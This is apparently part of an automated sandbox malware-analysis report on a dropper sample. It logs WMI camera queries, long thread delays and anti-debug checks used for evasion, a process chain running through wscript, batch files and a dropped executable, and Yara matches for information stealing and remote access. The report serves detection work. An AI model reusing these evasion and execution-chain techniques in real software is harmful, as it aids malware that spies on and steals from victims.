                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe Memory allocated: 2880000 memory reserve | memory write watch
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe Memory allocated: 1AAD0000 memory reserve | memory write watch
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe Memory allocated: 1630000 memory reserve | memory write watch
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe Memory allocated: 1B2D0000 memory reserve | memory write watch
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe Thread delayed: delay time: 922337203685477
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe Thread delayed: delay time: 922337203685477
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe Thread delayed: delay time: 600000
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe Thread delayed: delay time: 599874
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe Thread delayed: delay time: 599765
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe Thread delayed: delay time: 599656
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe Thread delayed: delay time: 599546
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe Thread delayed: delay time: 599437
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe Thread delayed: delay time: 599328
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe Thread delayed: delay time: 599218
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe Thread delayed: delay time: 599109
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe Thread delayed: delay time: 599000
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe Thread delayed: delay time: 598890
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe Thread delayed: delay time: 598781
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe Thread delayed: delay time: 3600000
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe Thread delayed: delay time: 598672
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe Thread delayed: delay time: 598562
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe Thread delayed: delay time: 598453
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe Thread delayed: delay time: 598344
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe Thread delayed: delay time: 598219
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe Thread delayed: delay time: 598109
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe Thread delayed: delay time: 598000
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe Thread delayed: delay time: 597890
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe Thread delayed: delay time: 597781
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe Thread delayed: delay time: 597672
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe Thread delayed: delay time: 597562
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe Thread delayed: delay time: 597453
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe Thread delayed: delay time: 597344
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe Thread delayed: delay time: 597234
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe Thread delayed: delay time: 597124
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe Thread delayed: delay time: 597015
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe Thread delayed: delay time: 596906
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe Thread delayed: delay time: 596797
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe Thread delayed: delay time: 596687
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe Thread delayed: delay time: 596578
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe Thread delayed: delay time: 596467
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe Thread delayed: delay time: 596359
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe Thread delayed: delay time: 596250
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe Thread delayed: delay time: 596140
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe Thread delayed: delay time: 596029
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe Thread delayed: delay time: 595752
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe Thread delayed: delay time: 595609
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe Thread delayed: delay time: 595481
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe Thread delayed: delay time: 595374
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe Thread delayed: delay time: 595265
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe Thread delayed: delay time: 595156
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe Thread delayed: delay time: 595033
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe Thread delayed: delay time: 594906
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe Thread delayed: delay time: 594797
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe Thread delayed: delay time: 594687
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe Thread delayed: delay time: 594578
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe Thread delayed: delay time: 594468
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeThread delayed: delay time: 594359Jump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWindow / User API: threadDelayed 1625Jump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWindow / User API: threadDelayed 8140Jump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe TID: 5684Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe TID: 7396Thread sleep time: -30000s >= -30000sJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe TID: 7484Thread sleep time: -28592453314249787s >= -30000sJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe TID: 7484Thread sleep time: -600000s >= -30000sJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe TID: 7484Thread sleep time: -599874s >= -30000sJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe TID: 7484Thread sleep time: -599765s >= -30000sJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe TID: 7484Thread sleep time: -599656s >= -30000sJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe TID: 7484Thread sleep time: -599546s >= -30000sJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe TID: 7484Thread sleep time: -599437s >= -30000sJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe TID: 7484Thread sleep time: -599328s >= -30000sJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe TID: 7484Thread sleep time: -599218s >= -30000sJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe TID: 7484Thread sleep time: -599109s >= -30000sJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe TID: 7484Thread sleep time: -599000s >= -30000sJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe TID: 7484Thread sleep time: -598890s >= -30000sJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe TID: 7484Thread sleep time: -598781s >= -30000sJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe TID: 7468Thread sleep time: -10800000s >= -30000sJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe TID: 7484Thread sleep time: -598672s >= -30000sJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe TID: 7484Thread sleep time: -598562s >= -30000sJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe TID: 7484Thread sleep time: -598453s >= -30000sJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe TID: 7484Thread sleep time: -598344s >= -30000sJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe TID: 7484Thread sleep time: -598219s >= -30000sJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe TID: 7484Thread sleep time: -598109s >= -30000sJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe TID: 7484Thread sleep time: -598000s >= -30000sJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe TID: 7484Thread sleep time: -597890s >= -30000sJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe TID: 7484Thread sleep time: -597781s >= -30000sJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe TID: 7484Thread sleep time: -597672s >= -30000sJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe TID: 7484Thread sleep time: -597562s >= -30000sJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe TID: 7484Thread sleep time: -597453s >= -30000sJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe TID: 7484Thread sleep time: -597344s >= -30000sJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe TID: 7484Thread sleep time: -597234s >= -30000sJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe TID: 7484Thread sleep time: -597124s >= -30000sJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe TID: 7484Thread sleep time: -597015s >= -30000sJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe TID: 7484Thread sleep time: -596906s >= -30000sJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe TID: 7484Thread sleep time: -596797s >= -30000sJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe TID: 7484Thread sleep time: -596687s >= -30000sJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe TID: 7484Thread sleep time: -596578s >= -30000sJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe TID: 7484Thread sleep time: -596467s >= -30000sJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe TID: 7484Thread sleep time: -596359s >= -30000sJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe TID: 7484Thread sleep time: -596250s >= -30000sJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe TID: 7484Thread sleep time: -596140s >= -30000sJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe TID: 7484Thread sleep time: -596029s >= -30000sJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe TID: 7484Thread sleep time: -595752s >= -30000sJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe TID: 7484Thread sleep time: -595609s >= -30000sJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe TID: 7484Thread sleep time: -595481s >= -30000sJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe TID: 7484Thread sleep time: -595374s >= -30000sJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe TID: 7484Thread sleep time: -595265s >= -30000sJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe TID: 7484Thread sleep time: -595156s >= -30000sJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe TID: 7484Thread sleep time: -595033s >= -30000sJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe TID: 7484Thread sleep time: -594906s >= -30000sJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe TID: 7484Thread sleep time: -594797s >= -30000sJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe TID: 7484Thread sleep time: -594687s >= -30000sJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe TID: 7484Thread sleep time: -594578s >= -30000sJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe TID: 7484Thread sleep time: -594468s >= -30000sJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe TID: 7484Thread sleep time: -594359s >= -30000sJump to behavior
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exeCode function: 0_2_00F8A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_00F8A69B
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exeCode function: 0_2_00F9C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_00F9C220
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exeCode function: 0_2_00FAB348 FindFirstFileExA,0_2_00FAB348
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exeCode function: 0_2_00F9E6A3 VirtualQuery,GetSystemInfo,0_2_00F9E6A3
                                    Source: wscript.exe, 00000002.00000003.1317864541.0000000000C32000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                                    Source: HcEvQKWAu2.exe, fontReviewsavesinto.exe.0.dr, kRoaRVhtzmWNJQRz.exe.11.dr, kRoaRVhtzmWNJQRz.exe0.11.dr, Registry.exe.11.dr, kRoaRVhtzmWNJQRz.exe1.11.dr, WmiPrvSE.exe.11.drBinary or memory string: xHSQEmUK4C
                                    Source: HcEvQKWAu2.exe, 00000000.00000003.1223783891.0000000000AE3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}k.
                                    Source: w32tm.exe, 0000000F.00000002.1408775278.0000020493FD9000.00000004.00000020.00020000.00000000.sdmp, fontReviewsavesinto.exe, 00000011.00000002.3691986592.000000001BC7D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exeAPI call chain: ExitProcess graph end nodegraph_0-25132
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeProcess information queried: ProcessInformationJump to behavior
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exeCode function: 0_2_00F9F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00F9F838
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exeCode function: 0_2_00FA7DEE mov eax, dword ptr fs:[00000030h]0_2_00FA7DEE
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exeCode function: 0_2_00FAC030 GetProcessHeap,0_2_00FAC030
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeProcess token adjusted: DebugJump to behavior
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exeCode function: 0_2_00F9F9D5 SetUnhandledExceptionFilter,0_2_00F9F9D5
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exeCode function: 0_2_00F9FBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00F9FBCA
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exeCode function: 0_2_00FA8EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00FA8EBD
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeMemory allocated: page read and write | page guardJump to behavior
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ComponentSavesinto\Rvb4MehGYPWwP7mOC7L2KZoGBB7qbkXbVDhXcse7w1B6.vbe" Jump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ComponentSavesinto\ZNtisV5JM91TmuX3tDFXvJx7ah2q8kJOB5hVZXHXTCGj5p.bat" "Jump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\ComponentSavesinto\fontReviewsavesinto.exe "C:\ComponentSavesinto/fontReviewsavesinto.exe"Jump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\F0ZVhIKmod.bat" Jump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2Jump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\ComponentSavesinto\fontReviewsavesinto.exe "C:\ComponentSavesinto\fontReviewsavesinto.exe" Jump to behavior
                                    Source: fontReviewsavesinto.exe, 00000011.00000002.3686700129.0000000003573000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exeCode function: 0_2_00F9F654 cpuid 0_2_00F9F654
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_00F9AF0F
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeQueries volume information: C:\ComponentSavesinto\fontReviewsavesinto.exe VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exeCode function: 0_2_00F9DF1E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,0_2_00F9DF1E
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exeCode function: 0_2_00F8B146 GetVersionExW,0_2_00F8B146
                                    Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                                    Stealing of Sensitive Information

                                    Source: Yara matchFile source: 00000011.00000002.3686700129.0000000003406000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000011.00000002.3686700129.000000000370A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 0000000B.00000002.1337505438.0000000002C0A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: Process Memory Space: fontReviewsavesinto.exe PID: 1648, type: MEMORYSTR
                                    Source: Yara matchFile source: Process Memory Space: fontReviewsavesinto.exe PID: 7392, type: MEMORYSTR
                                    Source: Yara matchFile source: HcEvQKWAu2.exe, type: SAMPLE
                                    Source: Yara matchFile source: 0.3.HcEvQKWAu2.exe.6fcf702.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 11.0.fontReviewsavesinto.exe.610000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.HcEvQKWAu2.exe.66ce702.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.HcEvQKWAu2.exe.66ce702.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.HcEvQKWAu2.exe.6fcf702.1.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0000000B.00000000.1319319511.0000000000612000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000003.1221219115.0000000006F81000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000003.1221537345.0000000004F2B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000003.1220726109.0000000006680000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: C:\ComponentSavesinto\WmiPrvSE.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\ComponentSavesinto\fontReviewsavesinto.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Recovery\Registry.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\ComponentSavesinto\kRoaRVhtzmWNJQRz.exe, type: DROPPED

                                    Remote Access Functionality

                                    Source: Yara match, File source: 00000011.00000002.3686700129.0000000003406000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara match, File source: 00000011.00000002.3686700129.000000000370A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara match, File source: 0000000B.00000002.1337505438.0000000002C0A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara match, File source: Process Memory Space: fontReviewsavesinto.exe PID: 1648, type: MEMORYSTR
                                    Source: Yara match, File source: Process Memory Space: fontReviewsavesinto.exe PID: 7392, type: MEMORYSTR
                                    Source: Yara match, File source: HcEvQKWAu2.exe, type: SAMPLE
                                    Source: Yara match, File source: 0.3.HcEvQKWAu2.exe.6fcf702.1.raw.unpack, type: UNPACKEDPE
